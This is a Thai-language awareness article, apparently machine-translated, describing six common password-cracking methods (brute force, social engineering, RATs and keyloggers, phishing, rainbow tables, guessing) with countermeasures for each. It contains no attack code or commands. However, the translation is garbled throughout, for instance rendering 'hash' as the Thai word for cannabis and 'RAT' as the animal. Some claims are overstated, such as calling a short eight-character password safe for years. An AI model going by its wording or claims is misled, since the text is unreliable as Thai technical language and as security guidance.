    มีจำนวนของวิธีการออกของพวกเขาใช้โดยแฮกเกอร์จะตัดบัญชีของคุณหรือได้รับข้อมูลส่วนบุคคลของคุณ วันนี้ในบทความนี้ผมจะร่วมกับคุณผู้ชายที่ 6 วิธีการที่ใช้กันมากที่สุดในการ crack รหัสผ่านและการตอบโต้ของพวกเขา คุณต้องตรวจสอบบทความนี้เพื่อความปลอดภัยและเพื่อป้องกันไม่ให้บัญชีออนไลน์ของคุณจากการลักลอบ

    1 BruteForce โจมตี

    โจมตีแรงเดรัจฉาน
    รหัสผ่านใด ๆ ที่สามารถแตกโดยใช้การโจมตี Brute แรง การโจมตีที่กำลังถูกลองได้ทุกชุดของตัวเลขตัวอักษรและอักขระพิเศษจนกระทั่งรหัสผ่านที่ถูกต้องคือการจับคู่ โจมตีแรงเดรัจฉานสามารถใช้เวลานานมากขึ้นอยู่กับความซับซ้อนของรหัสผ่าน เวลาแตกจะถูกกำหนดโดยความเร็วของคอมพิวเตอร์และความซับซ้อนของรหัสผ่าน
    ตอบโต้:ใช้รหัสผ่านที่ยาวและซับซ้อน พยายามที่จะใช้การรวมกันของตัวอักษรบนและตัวพิมพ์เล็กพร้อมกับหมายเลข โจมตีแรงเดรัจฉานจะใช้เวลาหลายร้อยหรือหลายพัน ๆ ปีจะแตกรหัสผ่านที่ซับซ้อนและระยะยาวดังกล่าว
    ตัวอย่าง: รหัสผ่านเช่น"iloveu"หรือ"รหัสผ่าน"สามารถแตกได้อย่างง่ายดายในขณะที่คอมพิวเตอร์จะใช้เวลาหลายปีในการ crack รหัสผ่านเช่น"aN34lL00"


    2 วิศวกรรมสังคม

    วิศวกรรมสังคมเป็นกระบวนการของการจัดการกับคนที่คุณไว้วางใจและได้รับข้อมูลจากพวกเขา ตัวอย่างเช่นถ้าแฮกเกอร์พยายามที่จะได้รับรหัสผ่านของเพื่อนร่วมงานหรือเพื่อนของคอมพิวเตอร์ที่เขาจะได้เรียกเขาทำท่าจะมาจากแผนกไอทีและก็ขอรายละเอียดการเข้าสู่ระบบของเขา แฮกเกอร์บางครั้งเรียกเหยื่อแกล้งทำเป็นจากธนาคารและขอรายละเอียดบัตรเครดิตของพวกเขาวิศวกรรมสังคมสามารถใช้ในการได้รับรหัสผ่านใครสักคนที่จะได้รับข้อมูลประจำตัวของธนาคารหรือข้อมูลส่วนตัวใด ๆ
    ตอบโต้ : ถ้ามีคนพยายามที่จะได้รับรายละเอียดส่วนบุคคลหรือธนาคารของคุณขอให้พวกเขาคำถามสองสามข้อ ให้แน่ใจว่าผู้ที่โทรคุณเป็น legit ไม่เคยให้รายละเอียดบัตรเครดิตของคุณบนโทรศัพท์

    3 หนูและคีย์ล็อกเกอร์

    keylogger
    ใน keylogging คะแนนหรือแฮกเกอร์จะส่ง keylogger หรือหนูที่จะตกเป็นเหยื่อ นี้จะช่วยให้แฮกเกอร์ในการตรวจสอบเหยื่อทุกสิ่งทำในคอมพิวเตอร์ของเขา การกดแป้นพิมพ์ทุกระบบรวมทั้งรหัสผ่าน แฮกเกอร์ Moreever ยังสามารถควบคุมเครื่องคอมพิวเตอร์ของเหยื่อผู้เคราะห์ร้าย
    ตอบโต้: ไม่เคยเข้าสู่บัญชีธนาคารของคุณจากไซเบอร์คาเฟ่หรือคนอื่นคอมพิวเตอร์ หากการใช้งานที่สำคัญบนหน้าจอหรือแป้นพิมพ์เสมือนจริงในขณะที่การคาดการเข้าสู่ระบบ ใช้ซอฟต์แวร์ป้องกันไวรัสที่ใหม่ล่าสุดและให้พวกเขาปรับปรุง ตรวจสอบด้านล่างบทความนี้เพื่อทราบข้อมูลเพิ่มเติมเกี่ยวกับหนูและคีย์ล็อกเกอร์

    4 ฟิชชิ่ง

    ฟิชชิ่งแฮ็ค
    ฟิชชิ่งมากที่สุดที่ง่ายที่สุดและเป็นที่นิยมวิธีการลักลอบใช้โดยแฮกเกอร์ที่จะได้รับรายละเอียดบัญชีของใครบางคน ฟิชชิ่งในการโจมตีของแฮกเกอร์ส่งหน้าปลอมของเว็บไซต์จริงเช่น Facebook, Gmail ของเหยื่อ เมื่อมีคนเข้าสู่ระบบผ่านหน้าปลอมที่รายละเอียดของเขาจะถูกส่งไปยังแฮกเกอร์ นี้หน้าปลอมที่สามารถสร้างขึ้นได้อย่างง่ายดายและโฮสต์บนเว็บไซต์ฟรีเว็บโฮสติ้ง
    ตอบโต้:ฟิชชิ่งโจมตีได้ง่ายมากที่จะหลีกเลี่ยง url ของหน้าเว็บฟิชชิ่งนี้จะแตกต่างจากคนจริง ตัวอย่างเช่น URL ของหน้าเว็บฟิชชิ่งของ facebook ของอาจมีลักษณะ facbbook.com (ที่คุณสามารถดูมีสอง "b" เป็น) เสมอให้แน่ใจว่าเว็บไซต์ url ที่ถูกต้อง ตรวจสอบด้านล่างบทความนี้เพื่อทราบข้อมูลเพิ่มเติมเกี่ยวกับการฟิชชิ่ง

    5 รุ้งตาราง

    ตารางรุ้งเป็นรายการก่อนคำนวณมาก hashes สำหรับทุกการรวมกันเป็นไปได้ของตัวละคร กัญชารหัสผ่านเป็นรหัสผ่านที่ได้ผ่านวิธีการทางคณิตศาสตร์เช่น md5 และจะกลายเป็นสิ่งที่ไม่ได้เป็นที่รู้จัก กัญชาเป็นวิธีหนึ่งในการเข้ารหัสดังนั้นเมื่อรหัสผ่าน hashed มีวิธีการรับสายเดิมจากสตริง hashed ไม่เป็น ขั้นตอนวิธี hashing มากมักใช้ในการเก็บรหัสผ่านในฐานข้อมูลของเว็บไซต์MD5 .มันเกือบจะคล้ายกับการโจมตีพจนานุกรมที่แตกต่างเป็นในตารางรุ้งโจมตี hashed ตัวอักษรที่ใช้เป็นรหัสผ่านในขณะที่ในพจนานุกรมโจมตีตัวอักษรปกติที่ใช้เป็นรหัสผ่าน
    ตัวอย่าง: 'สวัสดี'ใน md5 เป็น5d41402abc4b2a76b9719d911017c592และเป็นศูนย์สตริงระยะเวลา ( "" ) เป็นd41d8cd98f00b204e9800998ecf8427e
    ตอบโต้:ตรวจสอบให้แน่ใจว่าคุณเลือกรหัสผ่านที่มีความยาวและซับซ้อน การสร้างตารางสำหรับรหัสผ่านที่ยาวและซับซ้อนต้องใช้เวลานานมากและทรัพยากรมาก

    6 คาดเดา

    รหัสผ่านที่คาดเดา
    นี้ดูเหมือนว่าโง่ แต่นี้ได้อย่างง่ายดายช่วยให้คุณสามารถที่จะได้รับรหัสผ่าน someones ภายในไม่กี่วินาที หากแฮกเกอร์รู้ว่าคุณก็สามารถใช้ข้อมูลที่เขารู้เกี่ยวกับคุณที่จะคาดเดารหัสผ่านของคุณ แฮกเกอร์ยังสามารถใช้การรวมกันของวิศวกรรมทางสังคมและคาดเดาที่จะได้รับรหัสผ่านของคุณ
    ตอบโต้:ไม่ได้ใช้ชื่อของคุณนามสกุลหมายเลขโทรศัพท์หรือวันเกิดของคุณเป็นรหัสผ่าน พยายามที่จะหลีกเลี่ยงการสร้างรหัสผ่านที่เกี่ยวข้องกับคุณ สร้างรหัสผ่านที่ซับซ้อนและระยะยาวที่มีการรวมกันของตัวอักษรและตัวเลข